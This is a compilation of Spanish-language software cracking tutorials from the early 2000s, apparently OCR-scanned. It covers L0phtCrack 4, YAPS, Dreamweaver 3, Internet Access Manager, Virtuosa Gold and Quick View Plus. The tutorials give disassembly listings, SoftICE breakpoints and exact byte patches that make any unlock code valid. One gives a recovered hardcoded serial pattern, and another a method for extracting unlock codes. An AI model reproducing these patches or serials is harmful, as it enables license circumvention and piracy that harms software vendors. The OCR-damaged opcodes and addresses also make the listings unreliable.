NUMERO RARO QUE NO SE PARA QUE SIRVE... QUEEE???? PROVEMOS A VER SI ES EL SERIAL, ANDA? SIMIIM, LA VERDAD QUE NUNCA ME HABIA TOPADO CON ALGO ASI, QUE FACIL NOS LA DEJAN!!! 


TUTORIAL: Cómo crackear el LOpth 
Crack 4.0 
Una alternativa al tutorial de 
Groovy. 


Por Belzebú, 22/05/03 


Programa....... Lopth Crack 4.0 


Descarga......... http://www .atstake.com/research/lc/application/lc4setup.exe 


Objetivo............ Hacer ke cualkier “Unlock code” introducido sea 
válido y así registrar el programa. 


Herramientas...W32Dasm, Softlce, un Editor Hexadecimal y 
CodeFusion 


INTRODUCCIÓN 


Este tutorial es una alternativa al documento que publicó Groovy en 
su web http://www.zencracking.com.ar. Recomiendo descargar y leer 


previamente aquel tutorial y posteriormente éste, ya que en algún 
momento se hará referencia a él y alguna parte puede kedar confusa. 


DESARROLLO 


En la solución planteada por Groovy me pareció muy pesado el ir 
“nopeando” todos los saltos posteriores a la llamada a la función 
donde se comprueba la clave, así que decidí investigar un poco más 
esa 

CALL 0042789B 


Partí con el W32DASM estudiando las string references: “You have 
successfully registered” o "You have entered an invalid code”, por 
ejemplo, con lo que llegamos a la siguiente parte del código: 


:00411BFF 52 push edx ==> Ahí va el "Unlock code" correcto correspondiente al "serial number" 
del programa 
:00411C00 50 push eax ==> Ahí va el "Unlock code" ke introducimos nosotros 


:00411C01 E8955C0100 call 0042789B ==>FUNCIÓN KE DICE SI LA CLAVE INTRODUCIDA 
ES O NO CORRECTA 


:00411C06 83C410 add esp, 00000010 

:00411C09 85C0 test eax, eax 

:00411C0B 7523 jne 00411C30 ==> Si el "Unlock Code" introducido no es correcto salta a la zona 
TRIAL 

:00411C0D 8B07 mov eax, dword ptr [edi] 

:00411C0F 50 push eax 

* Possible StringData Ref from Data Obj ->"Unlock Code" 


| 
:00411C10 6850134700 push 00471350 
* Possible StringData Ref from Data Obj ->"Registration" 3 Sin comentarios 


| 

:00411C15 685C134700 push 0047135C 

:00411C1A 8BCE mov ecx, esi 

:00411C1C 899E3C010000 mov dword ptr [esi+0000013C], ebx 

:00411C22 E89AB20300 call 0044CEC1 

:00411C27 53 push ebx 

:00411C28 53 push ebx 

* Possible StringData Ref from Data Obj ->"You have successfully registered " 3 Sin comentarios 
->"LC4." 


| 

:00411C29 6834144700 push 00471434 

:00411C2E EBO7 jmp 00411C37 

* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
|:00411C0B(C) 


| 

:00411C30 53 push ebx ==> ZONA TRIAL 

:00411C31 53 push ebx 

* Possible StringData Ref from Data Obj ->"You have entered an invalid code. " 
->"Please try again." 


| 
:00411C32 6800144700 push 00471400 


A continuación pasé el LC4 por el Softice, poniendo un BPX 
00411C01. Al ir a registrar el programa introduciendo cualkier clave, 


lógicamente salta el breakpoint. Si en ese momento escribimos en el 
softice: 


D EAX veremos la clave introducida por nosotros 
y si hacemos: 


D EDX veremos el "Unlock Code" correcto correspondiente al Serial 
number del programa. 


En mi caso, para un serial Code 1727b4112, el "Unlock correcto" es 
eab77a. 


Siguiendo con el Softice estudié por ké camino ¡ba la ejecución del 
LC4, dentro de la llamada de comprobación del la clave, cuando la 
clave introducida no era la correcta. 

El Código de la CALL 00427896: 


* Referenced by a CALL at Addresses: 


|:00411983 , :00411C01 , :0042725C , :0042726D , :0042727E 
|:0042728F 


| 

:0042789B 55 push ebp 

:0042789C 8BEC mov ebp, esp 
:0042789E 83ECOC sub esp, 0000000C 
:004278A1 833DFC336B0000 cmp dword ptr [006B33FC], 00000000 
:004278A8 53 push ebx 

:004278A9 56 push esi 

:004278AA 57 push edi 

:004278AB 7512 jne 004278BF 
:004278AD FF750C push [ebp+0C] 
:004278B0 FF7508 push [ebp+08] 


:004278B3 E8C8690000 call 0042E280 ==> Esta llamada comprueba ke 
la clave introducida coincide símbolo a símbolo con la clave correcta 


:004278B8 59 pop ecx 
:004278B9 59 pop ecx 
:004278BA E96C010000 jmp 00427A2B 


* Referenced by a (U)nconditional or (C)onditional Jump at Addresses: 
|:004278BA(U), :00427A0C(U), :00427A1F(U) 


| 

:00427A2B 5F pop edi 
:00427A2C 5E pop esi 
:00427A2D 5B pop ebx 
:00427A2E C9 leave 
:00427A2F C3 ret 


Esta es la salida de la CALL 0042789B, ke devuelve si el "Unlock 
Code" introducido es correcto o no. 
La forma ke tiene de decirlo es: 


Si devuelve EAX=1, la clave introducida es INCORRECTA 
Si devuelve EAX=O0, la clave introducida es CORRECTA. 


| 
Estos valores para EAX se generan en CALL 0042E280, ke es donde 


se verifica uno a uno ke los caracteres introducidos de la clave 
coinciden con la correcta: 


* Referenced by a CALL at Addresses: 
|:004038DF , :00403C3F , :00404FDA , :004050E5 , :004278B3 


| 

:0042E280 55 push ebp 

:0042E281 8BEC mov ebp, esp 

:0042E283 57 push edi ==>Ahí va ahora la clave introducida 
:0042E284 56 push esi==>Ahí va ahora la clave correcta 
:0042E285 53 push ebx 

:0042E286 8B750C mov esi, dword ptr [ebp+0C] 

:0042E289 8B7D08 mov edi, dword ptr [ebp+08] 

:0042E28C 8D05740E6B00 lea eax, dword ptr [006B0E74] 
:0042E292 83780800 cmp dword ptr [eax+08], 00000000 
:0042E296 753B jne 0042E2D3 

:0042E298 BOFF mov al, FF 

:0042E29A 8BFF mov edi, edi 

* Referenced by a (U)nconditional or (C)onditional Jump at Addresses: 
|:0042E2A8(C), :0042E2C8(C) 


| 
:0042E29C OACO or al, al==>TENER EN CUENTA 


:0042E29E 742E je 0042E2CE ==>Cuando ha terminado de comprobar uno a uno los 
caracteres de la clave 
este salto nos saca del bucle de comprobación. TENER EN CUENTA!!! 


:0042E2A0 8A06 mov al, byte ptr [esi] ==> Se toma el primer carácter de la clave correcta 
contenida en "esi" y se pone en "al" 

:0042E2A2 46 inc esi ==> se incrementa uno para pasar al próximo carácter de la clave correcta 
:0042E2A3 8A27 mov ah, byte ptr [edi] ==> Se toma el primer carácter de la clave introducida 
contenida en "edi" y se pone en "ah" 

:0042E2A5 47 inc edi ==> se incrementa uno para pasar al próximo carácter de la clave 
introducida 

:0042E2A6 38C4 cmp ah, al ==> Akí se comparan ambos caracteres 

:0042E2A8 74F2 je 0042E29C ==> Si son iguales salta atrás para comprobar el siguiente carácter 
:0042E2AA 2C41 sub al, 41 Si no son iguales al final de todas las operaciones 
EAX=1=TRIAL. VER MAS ABAJO 

:0042E2AC 3C1A cmp al, 1A 

:0042E2AE 1AC9 sbb cl, cl 


:0042E2B0 80E120 and cl, 20 
:0042E2B3 02C1 add al, cl 
:0042E2B5 0441 add al, 41 
:0042E2B7 86EÉ0 xchg al, ah 
:0042E2B9 2C41 sub al, 41 
:0042E2BB 3C1A cmp al, 1A 
:0042E2BD 1ACO9 sbb cl, cl 
:0042E2BF 80E120 and cl, 20 
:0042E2C2 02C1 add al, cl 
:0042E2C4 0441 add al, 41 
:0042E2C6 38E0 cmp al, ah 
:0042E2C8 74D2 je 0042E29C 
:0042E2CA 1ACO sbb al, al 
:0042E2CC 1CFF sbb al, FF 

* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
|:0042E29E(C) 


| 

:0042E2CE OFBECO movsx eax, al ==> Akí se asigna a EAX el valor O=REGISTRADO ó 1=TRIAL, 
y depende del valor ke ha tomado "al" en las operaciones anteriores 

:0042E2D1 EB78 jmp 0042E34B. 


SOLUCION PROPUESTA 
Con todo lo anterior, la solución planteada consta de 2 pasos: 


PASO 1 
No me interesa ke compruebe ningún carácter entre la clave 
introducida y la correcta por lo tanto el salto: 


:0042E29E 742E je 0042E2CE 
lo sustituyo por: 
:0042E29E EB2E ¡mp 0042E2CE 


Con este cambio no se efectuará la comprobación, pero debemos 
asegurarnos de ke "al" tenga el valor ke nos convenga a nosotros es 
decir, ke "al"=0 para que en MOVSX eax, al, EAX=0=REGISTRADO. 


PASO 2 


Para conseguir ke EAX=0, en la instrucción previa al salto ke 
acabamos de modificar, hacemos lo siguiente: 


:0042E29C OACO or al, al 
lo sustituyo por : 
:0042E29C B000 mov al, 00 


Tras estos cambios acepta cualkier clave introducida como correcta. 
En esta alternativa se modifican solamente 3 bytes, por lo ke creo ke 
es más cómodo. 


Como crackear el YAPS! V 1.2 Por gr00Ovy 


Hola gente como les va? A mi bien!!!, Bueno aca estamos de vuelta con un nuevo 
tutorial. Esta ves vamos a crackear un port scanner. 


Bueno manos a la obra! : 


Primero ejecutamos el Programa Yaps!. Analizamos como es, vamos a ingresar un S/N 

y vemos que nos dice ok? 

Bueno, nos dice que esta mal, anotamos esa string y desensamblamos: 

La buscamos y no esta que cagada!!!! Que hacemo? Uhmm pensemos por donde 
podemos atacar ok? 

Ahhh ya se, vemos que tiene en la barra de titulo algo así: 

YAPS - Unregistered 

Esto tiene la pinta de que comprueba un flag que si esta a O esta registrado y si esta a 
1 no lo esta o viceversa. Buscamos en las string references y vemos esto: 


"x11" 

"YAPS - Unregistered" 
"YAPS %d% %" 

"YAPS finishing" 


Hacemos 2 clics en "YAPS - Unregistered" y vemos que hay ok? 


:004039D3 6830CD4000 push 0040CD30 
:004039D8 EBO5 jmp 004039DF 


* Possible StringData Ref from Data Obj ->"YAPS" 


:004039D3 6830CD4000 push 0040CD30 
:004039D8 EBO5 jmp 004039DF 


* Possible StringData Ref from Data Obj ->"YAPS - Unregistered" 


:004039DA 681CCD4000 push 0040CD1C 


Bueno aca hay que usar un poco la cabeza, en la barra de titulo cuando no esta 
registrado aparece "YAPS - Unregistered", yo creo que si estuviera registrado 
apareceria esto que esta en el codgo desensamblado "YAPS" y vemos que antes de esa 
strign hay un ¡mp osea que salta siemp re, y como si fuera magia ese ¡mp es el que 
llama a la cadena de unregistered, asi que lo que podemos hacer es noopear ese ¡mp 
para que llegue siempre a la cadena de YAPS registrado ok? Hasta aca entienden? : ) 
Bueno, probamos y.... no anda! Que habra pasado? Uhmmm no les digo siempre que 

se fijen cuantas referencias a un texto hay?? Y bue hacemos otro doble clic en "YAPS - 
Unregistered" (siempre en la ventana de string references) y vamos a parar aca (no 
hay mas referencias son solo 2): 


:00407538 33C0 xor eax, eax 
:0040753A EBO5 jmp 00407541 


* Referenced by a (U)nconditional or (C)onditional Jump at Addresses: 
|:0040751E(C), :0040752C(C) 


:0040753C 1BCO sbb eax, eax 
:0040753E 83D8FF sbb eax, FFFFEFEFE 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
| :0040753A (U) 


:00407541 85C0 test eax, eax 
:00407543 7464 je 004075A9 
:00407545 8B0DC0DB4000 mov ecx, dword ptr [0040DBCO0] 


* Possible StringData Ref from Data Ob3 ->"YAPS - Unregistered" 


:0040754B 681CCD4000 push 0040CD1C 
:00407550 C744241400000000 mov [esp+14], 00000000 


Uhmm mas o menos lo que vimos antes, la cadena "YAPS - Unregistered" es llamada 
desde: 

* Referenced by a (U)nconditional or (C)onditional Jump at Address: 

:0040753A(U) que si se fijan esta un poquito mas arriba, bueno este salto llama al 
procedimiento de mostrar o no el unregistered, que decimos si lo noopeamos?? Noooo 
si lo noopeamos creo que daria error por que no pondría nada en la barra (creo : ), lo 
que tenemos que hacer es ver que mas hay en este tan interesante codigo y vemos en 
00407543 un je, ejecutemos lon O al salto a verga que pasa ok? Y caemos aca: 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
| :00407543(C) 


:004075A9 8B0DC0ODB4000 mov ecx, dword ptr [0040DBC0] 


* Possible StringData Ref from Data Obj ->"YAPS" 


:004075AF 6830CD4000 push 0040CD30 


Como vemos, es el mensaje bueno de la barra de titulo asi que vamos y cambiamos el 
je por un jmp que seria un Ebh ok?? 


Y listo el pollo!!! Crackeado!!!! 


Cracker: gr0Ovy 
E-mail: groovy26000yahoo.com.ar 
WEB: www.zencracking.com.ar 


Como crackear el Macromedia Dreamweaver 3 


Hola amigos aca estoy de vuelta con un nuevo tutorial, esta ves de la mano del tan 
amado/odiado por mi y digo lo de odiado por que me cuesta un huevo hacer tutos con 
el!!! Bueno sin mas que decir nos vamos directo al codigo. 

Antes del codigo les quiero dar las gracias ya que la web esta andando de maravilla, 
nos mandan e- mails de todos lados y eso es lo que por lo menos espero yo. Que la 
gente pueda aprender de lo que yo les puedo enseñar que es cracking. Les agradezco 
a todos los e-mail que nos mandaron y que me sigan escribiendo!!! 


Bueno abrimos el Dreamweaver 3, ingresamos a Buy y ponemos todos los datos que 
nos pide (pueden ser reales o no eso lo ven uds), como metodo de envio pongan que 
se los envie por correo. Una vez hecho esto ahora al apretar buy nos saltara otra 
ventana, la de registracion: 


Complete Mail/Fax Payment 


This program ¡is waiting for the unlocking code from ReleaseNow.com. If you have the code, you 
may complete the registration. 
If you have received the unlocking code, please enter it below: 


If you are waiting for an unlocking code, do not press “New Registration” as this will cause your 
personal code to change. 


User information 


First Name [gr00wy Last Name [ar00wy 


Unlocking Code]! 234567890 


Note: Mail and fax payments take 48 hours to process. 


You can reach our Customer Service, 24 hours 7 days a week. 


If you need assistance, please send e-mail to supportMreleasenow.com, or call [650] 622-1499. 


New Registration Cancel 


Una ves llegado a este paso cerramos el Dreamweaver y reiniciamos en MS-DOS para 
luego cargar el sice. 

Una ves cargado el sice abrimos de vuelta el Dreamweaver y ponemos cualquier 
unlocking code, p. ej 1234567890 luego apretamos Ctrl.+ D para ir al SICE. Y poner 
un BPX GETDLGITEMTEXTA (esta funcion sirve para sacar el texto de un textbox y 
nosotros lo que queremos hacer es ver cuando lo saca y como por eso lo ponemos), 
luego F5 para salir del SICE y hacemos clic en OK para ver que el SICE salte como 
loco. 

Ok el sice ya salto pero no estamos en elcodigo de dreamweaver, sino que estamos en 
un lugar que no nos interesa (o sea que estamos en otra librería como kernel32), para 
ir a donde queremos apreta F11 y no llevara a una librería llamada RSALESAGENT o 
algo asi que es la encargada de la protección de dreamweaver. 


Una vez en el codigo del sales agent veremos que hace esto: 


:10005F01 FF1570220210 Call dword ptr [10022270] 
:10005F07 BF6CAO0O0210 mov edi, 1002A06C 
:10005F0C 83C9FF or ecx, FFFEFFFF 
:10005F0OF 33C0 xor eax, eax 
:10005F11 F2 repnz 

:10005F12 AE scasb 

:10005F13 F7D1 not ecx 

:10005F15 49 dec ecx 

:10005F16 83F90A cmp ecx, 0000000A 
/*Compara el Unlcok code con 10 caracteres*/ 
:10005F19 7455 je 10005F70 


/*Salta si son 10 y sino se va a un error*/ 


Tonces como es devido nos fijamos que nuestro unlock code tenga 10 caracterez (y los 
tiene 1234567890) o sino parados en el SICE ponemos R FL Z que va a cambiar el 

FLAG 0 a 1 o viceversa y hara que no salte al error (no lo hagas si tiene 10 caracteres 
tu unlock code por que sino va al error) 

Bueno una vez ejecutado el salto /* je 10005F70*/ paramos en plena comprobación 
del Unlocking Code, lo que tenemos que hacer ahora es ir sondeando los registros a 

ver cual cambia después de una accion sospechosa como por ej una call etc sha 
saben. Bueno mientras sondeo veo una call o sea la primera, me fije en todos los 
registros con D XXX donde XXX es el registro de 32 bits (te doy un consejo: en el sice 
caundo cambia un registro la ventana de registros (si no la ves apreta F2), cambia el 
color del registro modificado, asi que fijate en los que cambian después de una accion 
sospechosa y hacele un D XXX) bueno, sigo sondeando hasta que paso una call /*CALL 
00OCDCF90*/ y hago un D EAX y en la ventana de datos (si no la tenes pone en el SICE 
wd y aparecera) y me aparece YFYRCUMXKI. Bueno, que hacemos pos lo provamos!!! 

Y funciona!!! 

Ahora lo que tenemos que hacer es buscar el serial number, que esta en un archivo 
que se ubica en la carpeta c:1windows1templistmp o algo asi, elarchivo se llama 
serialization.dll (el mismo de arriba) lo desensamblamos y vemos que nos da 
generosamente los serials de algunas aplicaciones Macromedia, sino buscalo en el S2K 
=) 


Bueno espero que les halla gustado ya que me costo mucho subirlo a la page sha que 
no tengo mas telefono y el server de Pórtland anda para el ojete! 


Cracker: grOOvy 
E-mail: garoovy2600WMyahoo.com.ar 


WEB: www.zencracking.com.ar o http://groovycracking.8Sm.com 
Grupo: [zCt!] 


Miembros / Colaboradores: 
JB_Duc, FiReRaln, SerialCode9x 


Crackeando Internet Access Manager v 
1.0 
PROTECCION:Encontrar un serial Valido 
Objetivo:Encontrar un serial Valido 


DOWNLOAD: http:www.softfolder.com 


Herramientas: 


1. Softlce v 3.23 
2. W32dasm v 8.9 
3. Un Pelin de Conocimientos de Asm 13/08/2001 


INTRODUCCION 


lo unico que buscamos es aprender mas sobre PROTECCIONES DE SOFTWARE , y asi tomar lo bueno y desechar lo 
malo y aplicarlo en nuestros propios programas para cuando nos toque estar en una empresa desarrolladora de software, 
podamos ofrecer un mejor producto, LO QUE SE MERECE EL CLIENTE "" CALIDAD Y EFICIENCIA "" en este mundillo 
del SHAREWARE, estas investigaciones para nosotros son solo profesionales, nunca con el afan de FREGAR a la 
compañia en cuestion, si no ponerle un punto de partida para que abran los ojos y digan HEY!!! QUE ESTOY HACIENDO 


que obtiene por un pago a veces de muchos DOLLARS...... creo que me estoy saliendo del tema .. jejejjee.. empezemos 
con este CALDO DE OLLA o unico que buscamos es aprender mas sobre PROTECCIONES DE SOFTWARE , y asi tomar 
lo bueno y desechar lo malo y aplicarlo en nuestros propios programas para cuando nos toque estar en una empresa 
desarrolladora de software, podamos ofrecer un mejor producto, LO QUE SE MERECE EL CLIENTE "" CALIDAD Y 
EFICIENCIA "" en este mundillo del SHAREWARE, estas investigaciones para nosotros son solo profesionales, nunca con 
el afan de FREGAR a la compañia en cuestion, si no ponerle un punto de partida para que abran los ojos y digan HEY!!! 


estara feliz y contento con lo que obtiene por un pago a veces de muchos DOLLARS...... creo que me estoy saliendo del 
tema .. jejejjee.. empezemos con este CALDO DE OLLA 


AL ATAKE 


Comentario del Programa 


Bueno chavales otro tuto mas en la lista .... ahora le toca el turno al programa llamado Internet Access Manager v 1.0 el 
cual desde este momento le llamaremos laM, esta aplicación esta dirigida a algo en especial como lo es la cconfiguración 
de tus accesos telefonicos a internet o a otra computadora, asiendo el proceso lo mas facil posible para el usuario, tambien 
cuenta con un scheduler con el cual podras tener completo control de el tiempo de conexion que deseas, entre otra buenas 
opciones cuenta con una opcion de poder mostrar una estadistica con opcion de comparar dos estadisticas para tener una 
idea de cuanto tiempo y dinero estas gastando en tu conexion, tambien te mantiene en un estado pasivo la conexion 
cuando no etas usandola para prevenir una desconeccion por inactividad, a verdad es una buena utileria que merece estar 
dentro de tus aplicaciones de uso diario, pero porfavor comprenlo no sean gandallas...... lo que podemos decir sobre la 
proteccion es que es un poco burda ya que tratan de ponerla dificil, pero al final te das cuenta que es mucho mas facil de lo 
que imaginabas ya que dentro del programa ponen el serial correcto, y asi van comparando cada caracter que metes con 
el correcto, lo que se le llama hardcoded, ya veran por que lo digo. 


Manos a la Obra 


bueno amigos para empesar instalemos el laM y analizemoslo con la utileria File Inspector v 4.0 para saber si esta 
empakada y en que lengueje esta hecho: 


como podemos ver esta hecho con Borland Delphi 3.0, mmm otra vez delph... jejjeje ....no esta empakado ni nada por el 
estilo.. ok continuemos ...ahora ejecutemos el programa para ver si acepta un serial y si al iniciar elprograma nos aparece 
una ventanita como esta : 


mmm interesante .. jejejje ahora vamos y ponemos un numero de serie, que en mi caso pondre 123467890 y damos click 
en el boton de OK y nos salta una ventanita como esta : 


jejejeje mas de lo mismo, esto aprece una messagebox, lo primero seria desemsamblar el exe de el laM y buscar esa 
string, OK vayamos y desensamblemos, despues de un rato se termina de desemsamblar y vamos a buscar la string y cual 
es nuestra sorpresa que no hay nada de nada de SORRY, THE REGISTRATION BLA BLA BLA....se ve que estos 
programadores nos quieren hacer la vida de cuadritos, ok, 


Usando el SoftlCE 


Encontrar un Serial Valido 


se acuerdan que la ventanita de error tiene un aspecto de messagebox, ok entonces vallamos y reiniciemos la PCERA con 
el Sice listo para funcionar, lo primero sera ejecutar el laM e ir a la ventana de insercion del serial y meter de nuevo 
algunos numeros, insertenlos y antes de dar ok , vamos y damos CONTROL D e insertamos un BPX MESSAGEBOXA, 
damos CONTROL D y regresamos a el laM ahora si damos click en el boton de OK! y saltamos directamente al SICE, 
damos una sola vez F12 y nos aparece la messagebox diciendonos que nuestro codigo es erroneo, damos click en OK! y 
saltamos otra vez a el SICE ahi damos F12 dos veces mas y caemos en la siguiente direccion de memoria: 


:0049C002 33C0 xor eax, eax 


una vez ahi vamos a subir unas cuantas lineas hasta llegar a esta parte del codigo: 


:0049BF7F E864FEFFFF call 0049BDE8 
:0049BF84 84CO0 test al, al 
:0049BF86 7462 je 0O49BFEA 


como pueden ver aqui se encuentra una comparación y un salto condicional, esperen no vayan y cambien ese salto ya que 
si lo hacen solo haran que salga el mensaje de REGISTRATION CODE ACCEPTED, pero cuando reinicien el programa 
seguiran sin registrar, si se fijan hay una comparación y arribita una CALL que les parece si ponemos un breakpoint en la 
dirección de memoria 49BF7F y veamos lo que pasa ahi adentro....jejejejje.....insertemos un nuemrod e codigo falso como 
la primera vez y demos CONTROL D y pongamos BPX 49BF7F y despues damos control d y regresamos al programa y 
ahora si damos click en OK! y saltamos inmediatamente a esa dirección de memoria, en la cual caemos en la siguente 
parte del codigo de esa call y damos f10 hasta llegar a : 


:0049BEA4 8B06 mov eax, dword ptr [esi] 

:0049BEA6 E85181F6FF call 0O403FFC <--- esta call saca la longitud del codigo insertado y la devuelve en EAX 
:0049BEAB 83F80C cmp eax, 0000000C <---- compara la longitud obtenida den EAX con OCH que en decimal es 12 
:0049BEAE 7C43 jl 0O49BEF3 <------ salta al mensaje de error si es menor a 12 el codigo de registro insertado 
:0049BEBO0 8B06 mov eax, dword ptr [esi] <---- el acumulador EAX lleva nuestro codigo si es igual a 12 


:0049BEB2 803837 cmp byte ptr [eax], 37 <---- compara el primer caracter del codigo insertado con 37H que es 7 
:0049BEB5 753€ ¡ne 0049BEF3 <---- salta si al mensaje de error si no es igual 

:0049BEB7 8B06 mov eax, dword ptr [esi] 

:0049BEB9 80780130 cmp byte ptr [eax+01], 30 <---- compara el segundo caracter del codigo insertado con 30H que es 0 
:0049BEBD 7534 jne 0049BEF3 <---- salta si al mensaje de error si no es igual 

:0049BEBF 8B06 mov eax, dword ptr [esi] 

:0049BEC1 80780233 cmp byte ptr [eax+02], 33 <---- compara el tercer caracter del codigo insertado con 33H que es 3 
:0049BEC5 752€ ¡ne 0049BEF3 <---- salta si al mensaje de error si no es igual 

:0049BEC7 8B06 mov eax, dword ptr [esi] 

:0049BEC9 80780330 cmp byte ptr [eax+03], 30 <---- compara el cuarto caracter del codigo insertado con 30H que es 0 
:0049BECD 7524 ¡ne 0049BEF3 <---- salta si al mensaje de error si no es igual 

:0049BECF 8B06 mov eax, dword ptr [esi] 

:0049BED1 80780436 cmp byte ptr [eax+04], 36 <---- compara el quinto caracter del codigo insertado con 36H que es 6 
:0049BED5 751€ ¡ne 0049BEF3 <---- salta si al mensaje de error si no es igual 

:0049BED7 8B06 mov eax, dword ptr [esi] 

:0049BED9 80780949 cmp byte ptr [eax+09], 49 <---- compara el decimo caracter del codigo insertado con 49H que es | 
:0049BEDD 7514 ¡ne 0049BEF3 <---- salta si al mensaje de error si no es igual 

:0049BEDF 8B06 mov eax, dword ptr [esi] 

:0049BEE1 80780443 cmp byte ptr [eax+0A], 43 <---- compara el onceavo caracter del codigo insertado con 43H que es C 
:0049BEE5 750€ ¡ne 0049BEF3 <---- salta si al mensaje de error si no es igual 

:0049BEE7 8B06 mov eax, dword ptr [esi] 

:0049BEE9 80780B53 cmp byte ptr [eax+0B], 53 <---- compara el doceavo caracter del codigo insertado con 53H que es S 
:0049BEED 7504 ¡ne 0049BEF3 <---- salta si al mensaje de error si no es igual 

:0049BEEF B301 mov bl, 01 

:0049BEF1 EB07 jmp 0049BEFA 


bueno amigos aqui les traduje las instrucciones de como compara y genera el serial verdadero para lo acepte y ser usuario 
registrado"" entonces queda así: 


70306****ICS 


los asteriscos significan que del caracter 6 al 9 puedes poner cualquier numero, ya que el programa solo verifica los 


AHORA SI PODEMOS DECIR PROGRAMA CRACKEADO......... 


Saludos 


Saben que es lo mas gratificante en este medio de las investigaciones sobre protecciones que vulgarmente se le llama 
CRACKING aparte de obtener cada día mas y mas conocimientos y la satifación que se siente al poder con una 
protección, pues es la variedad de personalidades y amistades que uno va conociendo y haciendo con el tiempo, las 
cuales de alguna forma auque no las conoscas en persona o mucho menos en foto, les vas tomando aprecio, ya que éstas 
te van haciendo la vida mas facil y amena durante el tiempo que quieras permanecer en esto de el estudio de protecciones, 
asi vas entablando una amistad muy reconfortante conciertas personalidades de este medio, como les decia anteriormente 
conoce uno a muchas personas y quisiera aprovechar a mandar un saludo a mis mejores amigos, sin orden de preferencia 


, No espero romper algunas sencibilidades: 


mn mn 


Skuater : mi gran maestro 


Dek_OiN """"Estamos Locos ... jejejejjee.... 


ma 


Kuato Thor """" Compañero de mil batallas, don quijote y sancho panza ..... jejejje 


mn 


ActMAgo """" Sigue asi..... 
Karpoff """" El guru de las protecciones """""" 
Txeli""" COMPADRE Y AMIGO """" 
e Todo el DREAM TEAM de la Compilación de Tutoriales 2001 CdT2001 :) 
e Saludos a todos los crackers del mundo 


Nota: 


e Soy humano y cometo errores, si encuentras uno házmelo saber OK. 


Si deseas bajar la última versión de la compilación puedes hacerlo de aquí: Compilación de Tutoriales v 5.5 


e Sideseas aparecer en la compilación envía tu tutorial a: profesor_x(hotmail.com 


Chao!! 


Espero que hayan disfrutado leyendo este tutorial y que les sirva para incrementar sus habilidades, pero recuerden, lean 
muchos tutoriales, practiquen, estudien y CRACKEAR será mucho más fácil. 


Como crackear Virtuosa Gold 3.20 a 


Uhmm este objetivo es muy facil!!! 
Vamos al W32Dasm y abrimos el Virtuosa, lo que queremos remover es la molesta NAG que nos dice paguenme, etc. 
Tonces que tenemos que hacer?, com oya sabemos la nag es la primer cosa que se abre y generalmente el codigo va a ser uno de los primeros, entonces nos vamos a el principio del codigo: 


PARAR A A 44 44444 ASSEMBLY CODE LISTING 4444444444444 44442 
Jae a oe ae de de oleo oe le le le ol ole e le le Start of Code in Object A IO 
Program Entry Point = 00495EEO0 (virtuosa.exe File Offset:001734E0) 


:00401000 6GAFF push FFFFFFFF 

:00401002 68DAF74C00 push 004CF7DA 

:00401007 64A 100000000 mov eax, dword ptr fs:[00000000] 
:0040100D 50 push eax 

:0040100E 64892500000000 mov dword ptr fs:[00000000], esp 
:00401015 51 push ecx 

:00401016 56 push esi 

:00401017 6A3C push 0000003C 

:00401019 ESE2E00A00 call 004AF100 

:0040101E 8BFO mov esi, eax 

:00401020 83C404 add esp, 00000004 

:00401023 89742404 mov dword ptr [esp+04], esi 
:00401027 33C0 xor eax, eax 

:00401029 3BFO cmp esi, eax 

:0040102B 89442410 mov dword ptr [esp+10], eax 
:0040102F 740F je 00401040 

:00401031 8BCE mov ecx, esi 

:00401033 ESD59C0OA00 call 004AADOD 

:00401038 C70618F04D00 mov dword ptr [esi], 004DF018 
:0040103E 8BC6 mov eax, esi 


Cuantas cosas interesantes para provar, y si noopearamos alguna de esas call? 
Vamos a noopear a esta: 
:00401019 ESE2E00A00 call 004AF100 


Y que paso anduvo? SIMI! !!! 


E-mail: groovy26000 yahoo.com.ar 
WEB: www.zencracking.com.ar 
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Trucos para Softlce 


tKC Cracking Tutor, lección 1 


Cuando usas W32Dasm, no consigues números de serie o códigos, te enseña donde o cómo 
puedes cambiar un n” de serie. Esto es lo que hago cuando crackeo programas, este tutorial te 
enseñará como lo hago, paso a paso. Perdón por mis errores gramaticales, espero que entiendas 
este pedazo! 


Herramientas: 
Necesitarás lo siguiente: (Yo usé estas herramientas, y doy por hecho que tú también las usarás): 


- W32Dasm 8.5 o superior. (www.expage.com/page/w32dasm) 


- Hacker's View 5.24 (E.mail: sen Osuslikov.kemerovo.su) 


- Norton Commander o Windows Commander (te explicaré después porque usé esto). 
- Turbo Pascal 7.0 
- TASM é TLINK 3.0 
Pregunta a cualquier cracker donde conseguir estas herramientas, estará dispuesto a servirte! 
Contenidos: 
1) Como crackear Quick Wiew Plus 4.0 
2) Como crackear HEX WorkShop 2.51 


3) Como hacer tus propios parches. 


Parte 1: Quick View Plus 4.0 
- Paso 1.- Ejecuta ORDER32.EXE 


- Paso 2.- Haz clic en $49 licencia simple (también puedes hacer clic en $59), pulsa aceptar, 
y abrir por teléfono (UNLOCK BY PHONE). 


- Paso 3.- Introduce un código para conseguir el mensaje de error (Debes apuntarlo)y sal del 
programa pulsando cancelar. 


- Paso 4.- Ejecuta el Norton Commander, y ve al directorio de QVP. 


- Paso 5.- Copia ORDER32.EXE a ORDER32.EXX (como backup) y copia 
ORDER32.EXE a 1.EXE (para usar con W32Dasm). 


- Paso 6.- Ejecuta el W32Dasm y desensambla 1.EXE 


- Paso 7.- Una vez este desensamblado, pulsa referencia de cadena de datos (STRING 
DATA REFERENCE), busca la cadena (String) “Has introducido un código incorrecto. Por favor 
comprueba tu acceso” (Debes recordar el mensaje de error), y haz doble click sobre él. 


- Paso 8.- Cierra la ventana SDR, y deberías ver la línea: 

* Possible reference to String Resource ID=00041: “You have entered... 
:004049F8 6A29 push 00000029 
:004049FA FF353CCE4000 — push dword ptr [0040CE3C] 


- Paso 9.- OK, ahora debes buscar la última comparación como CMP, JNE, JE, TEST ect. antes 
de la cadena de error. Presiona la flecha hacia arriba hasta que la encuentres. 


:004049CD 755A jne 00404A29 
* Possible reference to String Resource ID=00032: “You must select... 


:004049CF 6420 push 00000020 


* Possible reference to String Resource ID=00040: “Unlock Error” 


- Paso 10.- Ahora sabes a donde se salta cuando introduces un código erróneo. Ahora quieres 
ver si esto funciona cuando cambias “ne” con “je”. Asegúrate que la barra de color verde esta en 
:004049CD 755A jne 0040429, verás la dirección de compensación bajo la pantalla (Ooffset 
00003DCDh). Es donde puedes hacer el parche para ORDER32.EXE. 


